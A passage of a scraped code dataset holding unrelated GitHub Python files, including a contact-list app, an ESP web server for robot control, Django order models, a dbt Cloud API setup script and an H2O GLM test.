\")\n\n print(f\"Hello {user_name}. 
What would you like to do?\")\n print('\\n')\n\n while True:\n print(\"Use these short codes: \\n cc - create a new contact \\n dc - display contacts \\n fc - find a contact \\n ex - exit the contact list app \\n del - delete a contact \\n cpc - copy a contact email\")\n\n short_code = input().lower()\n\n if short_code == 'cc':\n print('New Contact')\n print('-' * 10)\n\n f_name = input('First name...:')\n\n l_name = input('Last name...:')\n\n p_number = input('Phone number...:')\n\n e_address = input('Email address...: ')\n\n save_contact(create_contact(f_name,l_name,p_number,e_address)) #create and save new contact\n print('\\n')\n print(f'New contact {f_name} {l_name} created')\n print('\\n')\n\n elif short_code == 'dc':\n\n if display_contacts():\n print('Here is a list of all your contacts')\n print('\\n')\n\n for contact in display_contacts():\n print(f'{contact.first_name} {contact.last_name} ......{contact.number}')\n\n print('\\n')\n else:\n print('\\n')\n print('You don\\'t seem to have any contact saved yet')\n print('\\n')\n\n elif short_code == 'fc':\n\n search_number = input('Enter the number you want to search for: ')\n\n if check_existing_contacts(search_number):\n search_contact = find_contact(search_number)\n print(f'{search_contact.first_name} {search_contact.last_name}')\n print('-' * 20)\n\n print(f'Phone number......: {search_contact.phone_number} \\n Email address......: {search_contact.email}')\n\n else:\n print('That contact does not exist')\n\n elif short_code == 'del':\n \n search_number = input('Enter the number you want to delete: ')\n\n if check_existing_contacts(search_number):\n search_contact = find_contact(search_number)\n print(f'{search_contact.first_name} {search_contact.last_name}')\n print('-' * 20)\n\n del_contact(search_contact)\n print('Your contact has been deleted')\n\n else:\n print('That contact does not exist')\n\n elif short_code == 'cpc':\n\n search_number = input('Enter the number you want to copy: ')\n\n if check_existing_contacts(search_number):\n search_contact = find_contact(search_number)\n print(f'{search_contact.first_name} {search_contact.last_name}')\n print('-' * 20)\n\n Contact.copy_email(search_number)\n print('\\n Your contact has been copied. \\n')\n\n elif short_code == 'ex':\n print('Bye..... It was fun while it lasted.... :-)')\n break\n\n else:\n print('I really didn\\'t get that. Please use the short codes')\n\nif __name__ == '__main__':\n\n main()","repo_name":"newtonkiragu/contact-list","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":4090,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"14297577549","text":"\"\"\"\n1160. 
Find Words That Can Be Formed by Characters\nhttps://leetcode.com/problems/find-words-that-can-be-formed-by-characters/\n\"\"\"\n\nclass Solution:\n def countCharacters(self, words: List[str], chars: str) -> int:\n from collections import Counter\n counts = Counter(chars)\n res = 0\n for w in words:\n w_counts = Counter(w)\n if counts & w_counts == w_counts:\n res += len(w)\n return res","repo_name":"mathvolcano/leetcode","sub_path":"1160_countCharacters.py","file_name":"1160_countCharacters.py","file_ext":"py","file_size_in_byte":458,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"16638157248","text":"#and \n\n#take three numbers and find out max \n\nprint(\"Enter three numbers\")\nn1 = input()\nn2 = input()\nn3 = input()\n\nn1 = int(n1)\nn2 = int(n2)\nn3 = int(n3)\n\nif n1 > n2 and n1 > n3: \n print(\"n1 is max\")\nelif n2 > n1 and n2 > n3:\n print(\"n2 is max\")\nelse:\n print(\"n3 is max\")\n ","repo_name":"tejasshah2k19/pratham-python","sub_path":"ifelsewithand.py","file_name":"ifelsewithand.py","file_ext":"py","file_size_in_byte":285,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"70748603714","text":"try:\n import usocket as socket\nexcept:\n import socket\n\nimport network\n\nimport esp\nesp.osdebug(None)\n\nimport gc\ngc.collect()\n\nssid = 'Mapper'\npassword = 'JokesOnYou'\n\nap = network.WLAN(network.AP_IF)\nap.active(True)\nap.ifconfig(('192.168.12.4','255.255.255.0', '192.168.12.1', '8.8.8.8'))\nap.config(essid=ssid, password=password, authmode = 3)\n\nwhile ap.active() == False:\n pass\n\nprint('Setup Successful')\nprint(ap.ifconfig())\n\ndef web_page(line):\n \n STATUS = line[0]\n \n html =\"\"\"\n \n ESP Web Server\n \n \n \n \n \n

      <h2>ESP Web Server</h2>\n      <p>\"\"\" + STATUS + \"\"\"</p>\n      <p><a href=\"/?forward\"><button>Forward</button></a></p>\n      <p><a href=\"/?left\"><button>Left</button></a> <a href=\"/?stop\"><button>Stop</button></a> <a href=\"/?right\"><button>Right</button></a></p>\n      <p><a href=\"/?back\"><button>Reverse</button></a></p>
      \n \n\n \"\"\"\n return html\n\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\ns.bind(('', 80))\ns.listen(5)\n\nline = [\"\"]\n\nwhile True:\n conn, addr = s.accept()\n print('Got a connection from %s' % str(addr))\n request = conn.recv(1024)\n request = str(request)\n print('Content = %s' % request)\n # =====================================================================\n forward = request.find('/?forward')\n back = request.find('/?back')\n left = request.find('/?left')\n right = request.find('/?right')\n stop = request.find('/?stop')\n\n if forward == 6:\n print (\"Forward\")\n line = [\"Forward\"]\n if back == 6:\n print (\"Reverse\")\n line = [\"Reverse\"]\n if left == 6:\n print (\"Left\")\n line = [\"Left\"]\n if right == 6:\n print (\"Right\")\n line = [\"Right\"]\n if stop == 6:\n print (\"Stop\")\n line = [\"Stop\"]\n \n # =====================================================================\n response = web_page(line)\n conn.send(response)\n conn.close()","repo_name":"hamtamSP/JAV2","sub_path":"Vincent_Adventure/Blog/Source_code/thonny file/mian.py","file_name":"mian.py","file_ext":"py","file_size_in_byte":2989,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"12509722855","text":"def fib3(n):\n if n <= 0:\n return 0\n\n if n == 1 or n== 2:\n return 1\n\n a = 1\n b = 1\n c = 1\n d = 0\n k = n-3\n while k != 0:\n # matrix multiplication ((a, b), (c, d)) * ((e, f), (g, h)) where latter is ((1, 1), (1, 0))\n # is ((ae+bg, af+bh), (ce+dg, cf+dh)) = ((a+b,a), (c+d, c))\n (a, b, c, d) = (a+b, a, c+d, c)\n k = k - 1\n # vector multiplication ((a, b), (c, d)) * ((e), (g))) where the latter is ((1),(1)) = (a+b, c+d)\n # Fibonacci of n is the first term a+b which is returned\n return a+b\n\n# check if the number of terms is valid\nprint(fib3(30))\n","repo_name":"jvk36/UB-CSE-JV-CSE-331","sub_path":"lec_5_29_Fibonacci/fib3.py","file_name":"fib3.py","file_ext":"py","file_size_in_byte":620,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"9014167381","text":"from scipy.stats import beta\nimport numpy as np\n\n__all__ = ['aggregate_ranks']\n\n\ndef betascores(r):\n x = np.asarray(r, np.float)\n n = x.size\n x.sort()\n p = beta.cdf(x=x, a=np.arange(1, n + 1), b=np.arange(n, 0, -1))\n return p\n\n\ndef rhoscores(r):\n x = betascores(r)\n rho = min(x.min() * x.size, 1)\n return rho\n\n\ndef rank_matrix(glist):\n unique_elements = set()\n for l in glist:\n unique_elements.update(l)\n\n names = list(unique_elements)\n names.sort()\n ncol = len(glist)\n nrow = len(unique_elements)\n\n N = nrow\n rmat = np.ones(dtype=np.float, shape=(nrow, ncol))\n\n # This is the most obvious candidate for optimizing.\n # For loops should be rewritten to numpy array indexing operations\n for col in range(ncol):\n rows = [names.index(i) for i in glist[col]]\n for ind, row in enumerate(rows):\n rmat[row, col] = (1.0 + ind) / N\n\n return rmat, names\n\n\ndef aggregate_ranks(glist):\n \"\"\"\n Args:\n glist (list of lists):\n Returns:\n sorted list of (item, score) tuples\n lower score is better.\n \"\"\"\n rmat, names = rank_matrix(glist)\n return sorted(zip(names, (rhoscores(row) for row in rmat)), key=lambda x: x[1])\n\n","repo_name":"taagdev/texta","sub_path":"utils/robust_rank_aggregation/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1232,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"61"} 
+{"seq_id":"73731550273","text":"\"\"\"empty message\n\nRevision ID: 977aacf533bb\nRevises: 90f79c1e9d89\nCreate Date: 2019-07-30 14:37:44.899661\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = '977aacf533bb'\ndown_revision = '90f79c1e9d89'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_column('items', 'parcel_id')\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.add_column('items', sa.Column('parcel_id', sa.INTEGER(), autoincrement=False, nullable=True))\n # ### end Alembic commands ###\n","repo_name":"alexarirok/Flask-Project","sub_path":"migrations/versions/977aacf533bb_.py","file_name":"977aacf533bb_.py","file_ext":"py","file_size_in_byte":677,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"29420746725","text":"import keras\nimport numpy as np\nimport pandas as pd\nimport librosa\n\n\nclass WaveDataGenerator(keras.utils.Sequence):\n def __init__(self, file_paths, labels=None, batch_size=32, sampling_rate=44100, audio_duration=2, mixup=False, image_aug=False):\n self.file_paths = file_paths\n self.labels = labels\n self.batch_size = batch_size\n self.sampling_rate = sampling_rate\n self.audio_duration = audio_duration\n self.samples = self.sampling_rate * self.audio_duration\n\n def __len__(self):\n return int(np.ceil(len(self.file_paths) / float(self.batch_size)))\n\n def __getitem__(self, idx):\n batch_x = self.file_paths[idx * self.batch_size:(idx + 1) * self.batch_size]\n data = np.array([self.read_audio(file_path) for file_path in batch_x])\n\n if self.labels is None:\n return data\n\n batch_y = np.array(self.labels[idx * self.batch_size:(idx + 1) * self.batch_size])\n return data, batch_y\n\n def read_audio(self, file_path):\n y, sr = librosa.load(file_path, sr=self.sampling_rate)\n # trim silence\n if 0 < len(y): # workaround: 0 length causes error\n y, _ = librosa.effects.trim(y) # trim, top_db=default(60)\n # make it unified length to conf.samples\n if len(y) > self.samples:\n # take the first n samples\n y = y[0:0 + self.samples]\n else: # pad blank\n padding = self.samples - len(y) # add padding at both ends\n offset = padding // 2\n y = np.pad(y, (offset, self.samples - len(y) - offset), 'constant')\n return y.reshape((1, self.samples))\n\n\ndef load_wave_files(file_paths):\n generator = WaveDataGenerator(file_paths)\n data = [ generator.read_audio(file_path) for file_path in file_paths]\n return np.array(data)\n\n\ndef test_generate_wave_files():\n train_curated = pd.read_csv('data/train_curated.csv')\n labels = train_curated['labels'].str.get_dummies(sep=',')\n file_paths = np.array(['data/train_curated/' + file_name for file_name in train_curated['fname']])\n generator = WaveDataGenerator(file_paths, labels)\n x, y = generator[0]\n print(x.shape)\n print(y.shape)\n\n\nif __name__ == \"__main__\":\n test_generate_mel_data_files()\n","repo_name":"Wal8800/kaggle","sub_path":"audio-tagging-2019/wave_data_generator.py","file_name":"wave_data_generator.py","file_ext":"py","file_size_in_byte":2268,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"29709843784","text":"from decimal import Decimal\n\nfrom django.db import models\nfrom django.contrib.contenttypes.models import ContentType\nfrom django.db.models import Q\nfrom 
polymorphic.models import PolymorphicModel, PolymorphicManager\nfrom django.urls import reverse\nfrom django.utils import timezone\n\nfrom ..offer.models import Offer\nfrom .status_choises import Status\nfrom ..offer.price_choises import PriceType\n\n# Create your models here.\n\n\nclass OrderQuerySet(models.QuerySet):\n def search(self, **kwargs):\n qs = self\n if kwargs.get('id', ''):\n qs = qs.filter(pk=kwargs['id'])\n if kwargs.get('status', ''):\n status = kwargs['status']\n if status == Status.finished.name:\n qs = qs.filter(~Q(date_finished=None))\n if status == Status.canceled.name:\n qs = qs.filter(~Q(date_canceled=None))\n if status == Status.process.name:\n qs = qs.filter(date_finished=None, date_canceled=None)\n if kwargs.get('client_id', ''):\n qs = qs.filter(client__id=kwargs['client_id'])\n\n if kwargs.get('sort_by', ''):\n qs = qs.order_by(kwargs['sort_by'])\n\n return qs\n\n\nclass Order(models.Model):\n client = models.ForeignKey(\"user.CustomUser\", on_delete=models.PROTECT, verbose_name='Клиент')\n comment = models.TextField(verbose_name=\"комментарий к заказу\", blank=True, null=True)\n paid = models.DecimalField(max_digits=12, decimal_places=2, default=0, verbose_name='Оплачено') # сколько заплатили\n refunded = models.DecimalField(max_digits=12, decimal_places=2, default=0, verbose_name='Возвращено')\n date_create = models.DateTimeField(verbose_name=\"дата создания\", auto_now_add=True)\n date_full_prepayment = models.DateTimeField(verbose_name=\"дата полной предоплаты\", blank=True, null=True)\n date_full_paid = models.DateTimeField(verbose_name=\"дата полной оплаты\", blank=True, null=True)\n date_finished = models.DateTimeField(verbose_name=\"дата завершения\", blank=True, null=True)\n date_canceled = models.DateTimeField(verbose_name=\"дата отмены\", blank=True, null=True)\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n if self.pk:\n self.__original_paid, self.__original_price = self.paid, self.price\n else:\n self.__original_paid, self.__original_price = 0, 0\n\n def save(self, *args, **kwargs):\n if self.pk and (self.__original_paid != self.paid or self.__original_price != self.price):\n self.check_payment()\n super().save(*args, **kwargs)\n\n def check_payment(self):\n if self.paid >= self.prepayment:\n self.purchases.filter(is_canceled=False).update(is_prepayment_paid=True)\n if self.date_full_prepayment is None:\n self.date_full_prepayment = timezone.now()\n\n if self.paid >= self.price:\n self.purchases.filter(is_canceled=False).update(is_paid=True)\n if self.date_full_paid is None:\n self.date_full_paid = timezone.now()\n\n if self.paid < self.prepayment and self.date_full_prepayment is not None:\n self.date_full_prepayment = None\n if self.paid < self.__original_paid:\n self.purchases.filter(is_canceled=False).update(is_prepayment_paid=False)\n\n if self.paid < self.price and self.date_full_paid is not None:\n self.date_full_paid = None\n if self.paid < self.__original_paid:\n self.purchases.filter(is_canceled=False).update(is_paid=False)\n\n def mark_as_prepayment_paid(self):\n self.paid = self.prepayment\n self.save()\n\n def mark_as_fully_paid(self):\n self.paid = self.price\n self.save()\n\n def mark_as_refund_made(self):\n for purchase in self.purchases.filter(is_canceled=True, is_refund_made=False):\n purchase.is_refund_made = True\n purchase.save()\n refund_made = self.left_to_refund\n self.paid -= refund_made\n self.refunded += refund_made\n self.save()\n\n def mark_as_canceled(self):\n if self.is_cancelable():\n 
self.date_canceled = timezone.now()\n self.date_finished = None\n self.save()\n for purchase in self.purchases.filter(is_canceled=False, is_paid=False):\n purchase.is_canceled = True\n purchase.save()\n\n def mark_as_finished(self):\n self.date_canceled = None\n self.date_finished = timezone.now()\n if self.paid < self.price:\n self.paid = self.price\n self.save()\n for purchase in self.purchases.filter(is_canceled=False, is_paid=False):\n purchase.is_paid = True\n purchase.save()\n\n def mark_as_in_process(self):\n self.date_canceled = None\n self.date_finished = None\n self.save()\n\n def is_editable(self):\n if self.status == Status.finished.value or self.status == Status.canceled.value:\n return False\n return True\n\n def is_cancelable(self):\n if self.date_canceled is not None:\n return False\n return True\n\n @property\n def price(self):\n price = 0\n if not self.pk:\n return 0\n for purchase in self.purchases.all():\n if purchase.is_canceled and purchase.is_paid:\n price += purchase.price - purchase.refund\n elif purchase.is_canceled and not purchase.is_paid:\n price += purchase.prepayment\n elif not purchase.is_canceled:\n price += purchase.price\n\n return price\n\n @property\n def prepayment(self):\n prepayment = 0\n if not self.pk:\n return 0\n for purchase in self.purchases.filter(is_canceled=False):\n prepayment += purchase.prepayment\n return prepayment\n\n @property\n def left_to_refund(self):\n left_to_refund = self.paid - self.price\n if left_to_refund > 0:\n return left_to_refund\n return 0\n\n @property\n def left_to_pay(self):\n left_to_pay = self.price - self.paid\n if left_to_pay > 0:\n return left_to_pay\n return 0\n\n @property\n def status(self):\n if self.date_finished is not None:\n return Status.finished.value\n if self.date_canceled is not None:\n return Status.canceled.value\n return Status.process.value\n\n @property\n def payment_status(self):\n if self.date_full_paid is not None:\n return 'Полностью оплачен'\n if self.date_full_prepayment is not None:\n return 'Внесена предоплата'\n return 'Ожидает предоплату'\n\n @property\n def main_offer(self):\n if self.get_active_purchases().count() > 0:\n main_purchase = self.purchases.filter(is_canceled=False).order_by('-price').first()\n return main_purchase.offer\n main_purchase = self.purchases.order_by('-price').first()\n if main_purchase is not None:\n return main_purchase.offer\n\n @property\n def name(self):\n purchases_count = self.purchases.count()\n if purchases_count > 1:\n return f'{self.main_offer.name} и еще {purchases_count - 1} покупок'\n if self.main_offer is not None:\n return self.main_offer.name\n return f'Заказ от {self.date_create.date()}'\n\n @property\n def is_cart(self):\n if self.paid == 0 and self.refunded == 0 and self.date_canceled is None and self.date_finished is None:\n return True\n return False\n\n def get_active_purchases(self):\n return self.purchases.filter(is_canceled=False)\n\n def get_admin_edit_url(self):\n return reverse('admin_edit_order', kwargs={'order_id': self.pk})\n\n def get_admin_show_url(self):\n return reverse('admin_show_order', kwargs={'order_id': self.pk})\n\n def get_create_room_purchase_url(self):\n return reverse('create_room_purchase', kwargs={'order_id': self.pk})\n\n def get_create_service_purchase_url(self):\n return reverse('create_service_purchase', kwargs={'order_id': self.pk})\n\n def get_client_manage_url(self):\n return reverse('client_manage_order', kwargs={'order_id': self.pk})\n\n def get_client_cancel_url(self):\n return 
reverse('client_cancel_order', kwargs={'order_id': self.pk})\n\n    def get_client_pay_url(self):\n        return reverse('client_pay', kwargs={'order_id': self.pk})\n\n    def get_client_history_url(self):\n        return reverse('history_item', kwargs={'order_id': self.pk})\n\n    class Meta:\n        indexes = [\n            models.Index(fields=['paid', 'refunded', 'date_create'])\n        ]\n        ordering = ['-date_create']\n\n    objects = OrderQuerySet.as_manager()\n\n\nclass PurchaseManager(PolymorphicManager):\n    def update_order_decorator(bulk_func):\n        \"\"\"\n        DECORATOR FOR UPDATING THE ORDER AFTER ITEMS ARE ADDED\n        \"\"\"\n        from functools import wraps\n        @wraps(bulk_func)\n        def wrapper(*args, **kwargs):\n            purchases = bulk_func(*args, **kwargs)\n            if len(purchases) > 0:\n                order = purchases[0].order\n                order.save()\n            return purchases  # preserve the return value of the wrapped bulk_create\n\n        return wrapper\n\n    @update_order_decorator\n    def bulk_create(self, purchases, **kwargs):\n        for purchase in purchases:\n            purchase.clean()\n            purchase.price = purchase.calc_price()\n            purchase.prepayment = purchase.calc_prepayment()\n            purchase.refund = purchase.calc_refund()\n            if not purchase.is_canceled:\n                purchase.is_paid = False\n                purchase.is_prepayment_paid = False\n        return super(PurchaseManager, self).bulk_create(purchases, **kwargs)\n\n\nclass Purchase(PolymorphicModel):\n    order = models.ForeignKey(Order, on_delete=models.CASCADE, related_name=\"purchases\")\n    offer = models.ForeignKey(Offer, on_delete=models.CASCADE, related_name=\"purchases\")\n\n    is_paid = models.BooleanField(default=False, verbose_name='Оплачено')\n    is_prepayment_paid = models.BooleanField(default=False, verbose_name='Предоплата внесена')\n    is_refund_made = models.BooleanField(default=False, verbose_name='Средства возвращены')\n    is_canceled = models.BooleanField(default=False, verbose_name='Отменено')\n\n    start = models.DateTimeField()\n    end = models.DateTimeField()\n\n    price = models.DecimalField(max_digits=12, decimal_places=2) # final price\n    prepayment = models.DecimalField(max_digits=12, decimal_places=2) # final prepayment\n    refund = models.DecimalField(max_digits=12, decimal_places=2) # final refund amount\n\n    objects = PurchaseManager()\n\n    def get_status(self):\n        if self.is_canceled:\n            return 'Отменен'\n        if self.is_paid:\n            return 'Оплачен'\n        if self.is_prepayment_paid:\n            return 'Предоплата'\n        return 'Нет'\n\n    def calc_price(self):\n        delta_seconds = (self.end - self.start).total_seconds()\n        seconds_in_hour = 3600\n        seconds_in_day = seconds_in_hour * 24\n        if self.offer.price_type == PriceType.hour.name:\n            hours = round(Decimal(delta_seconds / seconds_in_hour), 0)\n            return self.offer.default_price * hours\n        if self.offer.price_type == PriceType.day.name:\n            days = round(Decimal(delta_seconds / seconds_in_day), 0)\n            return self.offer.default_price * days\n\n        raise ValueError('Неизвестный тип цены')\n\n    def calc_prepayment(self):\n        prepayment_ratio = Decimal(self.offer.prepayment_percent) / 100\n        return self.price * prepayment_ratio\n\n    def calc_refund(self):\n        refund_ratio = Decimal(self.offer.refund_percent) / 100\n        return self.price * refund_ratio\n\n    def save(self, *args, **kwargs):\n        self.price = self.calc_price()\n        self.prepayment = self.calc_prepayment()\n        self.refund = self.calc_refund()\n        super().save(*args, **kwargs)\n        order = self.order\n        order.save()\n\n    # def clean(self):\n    #     from django.core.exceptions import ValidationError\n    #\n    #     if not self.pk and self.order.date_full_prepayment:\n    #         raise ValidationError('Нельзя добавить покупки к уже подтвержденному заказу')\n    #\n    #     if self.order.date_canceled or 
self.order.date_finished:\n    #         raise ValidationError('Нельзя изменить завершенный заказ')\n    #\n    #     if self.pk and self.order.date_full_paid:\n    #         raise ValidationError('Нельзя изменить покупки оплаченного заказа заказ заказу')\n\n    def get_info(self):\n\n        return {\n            'offer': self.offer.get_info(),\n            'start': self.start.timestamp(),\n            'end': self.end.timestamp(),\n            'is_paid': self.is_paid,\n            'is_prepayment_paid': self.is_prepayment_paid,\n            'id': self.pk,\n            'edit_url': self.get_edit_url()\n        }\n\n    def cancel(self):\n        if not self.order.purchases.exclude(pk=self.id).filter(is_canceled=False).exists() and self.order.date_canceled is None:\n            self.order.mark_as_canceled()\n            return\n        if self.is_paid or self.is_prepayment_paid:\n            self.is_canceled = True\n            self.save()\n        else:\n            order = self.order\n            self.delete()\n            order.save()\n\n    def is_editable(self):\n        if self.is_canceled or not self.order.is_editable():\n            return False\n        if self.end is not None and self.end <= timezone.now():\n            return False\n        return True\n\n    def get_info_url(self):\n        return reverse('get_purchase', kwargs={'order_id': self.order.pk, 'purchase_id': self.pk})\n\n    def get_cancel_url(self):\n        return reverse('cancel_purchase', kwargs={'order_id': self.order.pk})\n\n    def get_remove_cart_item_url(self):\n        return reverse('remove_cart_item', kwargs={'purchase_id': self.pk})\n\n    def get_client_edit_url(self):\n        return reverse('client_manage_purchase', kwargs={'purchase_id': self.pk, 'order_id': self.order.pk})\n\n    def get_client_save_changes_url(self):\n        return reverse('client_save_room_changes', kwargs={'purchase_id': self.pk, 'order_id': self.order.pk})\n\n    def get_client_cancel_url(self):\n        return reverse('client_cancel_purchase', kwargs={'order_id': self.order.pk})\n\n    def get_edit_url(self):\n        return reverse('edit_room_purchase', kwargs={'order_id': self.order.pk})\n\n\nclass PurchaseCountable(Purchase):\n    quantity = models.SmallIntegerField(default=1)\n\n    def calc_price(self):\n        return super().calc_price() * self.quantity\n\n    def get_info(self):\n        data = super().get_info()\n        data['quantity'] = self.quantity\n        return data\n\n    def get_edit_url(self):\n        return reverse('edit_service_purchase', kwargs={'order_id': self.order.pk})\n\n    def get_client_save_changes_url(self):\n        return reverse('client_save_service_changes', kwargs={'purchase_id': self.pk, 'order_id': self.order.pk})\n\n\n","repo_name":"SergeiGD/Crystal-Lake-backend","sub_path":"crystallake/apps/order/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":15608,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"4063671675","text":"import cv2\nimport numpy as np\n\nvideoCapture = cv2.VideoCapture(0)\nprevCircle = None\ndef dist(x1, y1, x2, y2): return (x1-x2)**2+(y1-y2)**2 # squared Euclidean distance\n\n\nwhile True:\n    ret, frame = videoCapture.read()\n    if not ret:\n        break\n\n    gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n    blur = cv2.GaussianBlur(gray, (17, 17), 0)\n\n    circles = cv2.HoughCircles(blur, cv2.HOUGH_GRADIENT, 1.2,\n                               100, param1=100, param2=75, minRadius=75, maxRadius=500)\n\n    if circles is not None:\n        circles = np.uint16(np.around(circles))\n        chosen = None\n        for i in circles[0, :]:\n            if chosen is None:\n                chosen = i\n            if prevCircle is not None:\n                if (dist(chosen[0], chosen[1], prevCircle[0], prevCircle[1]) <= dist(i[0], i[1], prevCircle[0], prevCircle[1])):\n                    chosen = i\n        cv2.circle(frame, (chosen[0], chosen[1]), 1, (0, 100, 100), 3)\n        cv2.circle(frame, (chosen[0], chosen[1]), chosen[2], (255, 0, 255), 3)\n        prevCircle = 
chosen\n\n    flip_img = cv2.flip(frame, 1)\n    cv2.imshow(\"Frame\", flip_img)\n    if cv2.waitKey(1) & 0xFF == ord('q'):\n        break\n\nvideoCapture.release()\ncv2.destroyAllWindows()\n","repo_name":"wilgnerl/circle-detector","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1209,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"17181739060","text":"import numpy as np\n\nfrom .model_predict import ImageReader, predict_pose\n\n\ndef map_norm_item(item_list):\n    ret = []\n    for item in item_list:\n        ret.append({\"value\": item, \"norm\": np.linalg.norm(item)})\n    return ret\n\n\ndef cos_sim(a, b):\n    a_value_norm = map_norm_item(a)\n    b_value_norm = map_norm_item(b)\n    max_sim = 0\n\n    for a in a_value_norm:\n        for b in b_value_norm:\n            sim = np.divide(\n                np.dot(a[\"value\"], b[\"value\"]), np.multiply(a[\"norm\"], b[\"norm\"])\n            )\n            if sim > max_sim:\n                max_sim = sim\n    return max_sim\n\n\ndef get_angle(image: np.ndarray, angle_idx=0, isfile=False):\n    frame_provider = ImageReader([image], isfile=isfile)\n    angle = predict_pose(frame_provider).angles[angle_idx]\n    return angle\n","repo_name":"Gachon-LDC/Back-End","sub_path":"App/services/model_compare.py","file_name":"model_compare.py","file_ext":"py","file_size_in_byte":794,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"32975939495","text":"# Python skeleton example of how to create a set of Credential and Environment, then link them in dbt Cloud\n# Credentials have an \"id\" that is referenced by the Environment metadata\n\nimport requests\nimport json\nfrom requests import api\nfrom requests.api import head\nimport os\nimport re\nimport enum\n\n# set api token as environment variable or hardcode\n# this can be generated following these instructions https://docs.getdbt.com/docs/dbt-cloud/dbt-cloud-api/service-tokens\napi_token = os.getenv('DBT_CLOUD_API_KEY')\n# api_token = ''\n\n# set account_id & relevant job_id\n# this can be found in the url for the job in dbt Cloud\n# https://cloud.getdbt.com/#/accounts//projects/\naccount_id = 13858\nproject_id = 36215\nbase_url = 'https://cloud.getdbt.com'\n\n# snowflake creds\nusername = 'my_user'\npassword = 'my_password'\n\n# environment details\nenvironment_name = 'My Environment 3.0'\ndbt_version = '1.0.0'\ncreds_id = 0\n\ncredentials_create_body = f\"\"\"\n{{\n    \"id\": null,\n    \"account_id\": {account_id},\n    \"project_id\": {project_id},\n    \"state\": 1,\n    \"threads\": 1,\n    \"target_name\": \"default\",\n    \"type\": \"snowflake\",\n    \"schema\": \"dbt_username\",\n    \"auth_type\": \"password\",\n    \"user\": \"{username}\",\n    \"password\": \"{password}\"\n}}\n\"\"\"\n\n# set headers\nheaders = {\n    'Authorization': f\"Token {api_token}\",\n    'Content-Type': 'application/json'\n}\n\ncreds_url = f\"{base_url}/api/v3/accounts/{account_id}/projects/{project_id}/credentials/\"\n\n# create credentials\ntry:\n    result = requests.post(creds_url, headers=headers, data=json.dumps(json.loads(credentials_create_body)))\n    result = json.loads(result.content)\nexcept Exception as e:\n    raise SystemExit(e)\n\nprint(json.dumps(result, indent=4, sort_keys=True))\n\n\n# get credentials id\ncreds_id = result['data']['id']\n\nenvironment_create_body = f\"\"\"\n{{\n    \"id\": null,\n    \"account_id\": {account_id},\n    \"project_id\": {project_id},\n    \"name\": \"{environment_name}\",\n    \"credentials_id\": {creds_id},\n    \"dbt_version\": \"{dbt_version}\",\n    \"type\": 
\"deployment\"\n}}\n\"\"\"\n\nenvironment_url = f\"{base_url}/api/v3/accounts/{account_id}/projects/{project_id}/environments/\"\n\n# create environment with associated credentials\ntry:\n result = requests.post(environment_url, headers=headers, data=json.dumps(json.loads(environment_create_body)))\n result = json.loads(result.content)\nexcept Exception as e:\n raise SystemExit(e)\n\nprint(json.dumps(result, indent=4, sort_keys=True))","repo_name":"lbk-fishtown/examples","sub_path":"set_credentials.py","file_name":"set_credentials.py","file_ext":"py","file_size_in_byte":2461,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"13349088934","text":"#!/usr/bin/env python\n# -*- encoding: utf-8 -*-\nimport h2o\nfrom tests import pyunit_utils\nfrom h2o.estimators.glm import H2OGeneralizedLinearEstimator\n\nimport random\n\ndef random_attack():\n\n def cointoss():\n return random.randint(0, 1)\n\n def attack(family, train, valid, x, y):\n kwargs = {}\n kwargs[\"family\"] = family\n gaussian_links = [\"inverse\", \"log\", \"identity\"]\n binomial_links = [\"logit\"]\n poisson_links = [\"log\", \"identity\"]\n gamma_links = [\"inverse\", \"log\", \"identity\"]\n\n # randomly select parameters and their corresponding values\n if cointoss(): kwargs[\"max_iterations\"] = random.randint(1, 50)\n if random.random() > 0.8: kwargs[\"beta_epsilon\"] = random.random()\n if cointoss(): kwargs[\"solver\"] = [\"AUTO\", \"IRLSM\", \"L_BFGS\", \"COORDINATE_DESCENT_NAIVE\",\n \"COORDINATE_DESCENT\"][cointoss()]\n if cointoss(): kwargs[\"standardize\"] = [True, False][cointoss()]\n if cointoss():\n if family == \"gaussian\": kwargs[\"link\"] = gaussian_links[random.randint(0, 2)]\n elif family == \"binomial\": kwargs[\"link\"] = binomial_links[0]\n elif family == \"poisson\": kwargs[\"link\"] = poisson_links[cointoss()]\n elif family == \"gamma\": kwargs[\"link\"] = gamma_links[random.randint(0, 2)]\n if cointoss(): kwargs[\"alpha\"] = [random.random()]\n if family == \"binomial\":\n if cointoss(): kwargs[\"prior\"] = random.random()\n if cointoss(): kwargs[\"lambda_search\"] = [True, False][cointoss()]\n if \"lambda_search\" in list(kwargs.keys()):\n if cointoss(): kwargs[\"nlambdas\"] = random.randint(2, 10)\n do_validation = [True, 